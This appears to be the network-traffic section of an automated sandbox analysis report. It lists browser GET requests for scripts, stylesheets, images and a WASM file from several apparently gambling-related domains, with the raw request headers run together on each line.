Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/382/footerImg.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 43370d.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://43370d.top/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/btn_forget_n.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/homeCircle.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/iconSvg.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/countUp/countUp.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/382/footerNav.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/382/footerCopyRight.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/wrapper.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/slides.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/news.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/382/views/home/indexView.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mimlib.wasm HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/dg_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/allbet_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/mg_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/ag_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/og_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/312/menuSub.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/msites/themes/default/common.css?v=1717580749344 HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/footer/new/footer_gray_01.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/bonus.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/msites/themes/default/lang/zh_CN.css?v=1717580749344 HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/default/bootstrap/bootstrap.min.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/noticeBox.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/10100.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/footer/btn_service_n.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/uy09/202308/202308230603087.png HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gd_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gc_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/lebo_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/guide.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/layer.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/msgBox.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/top/icon_user.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/alertBox.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/top/icon_psw.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/error.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/images/errors/ico-605.png HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/main.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mimlib.wasm HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://yh8613.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
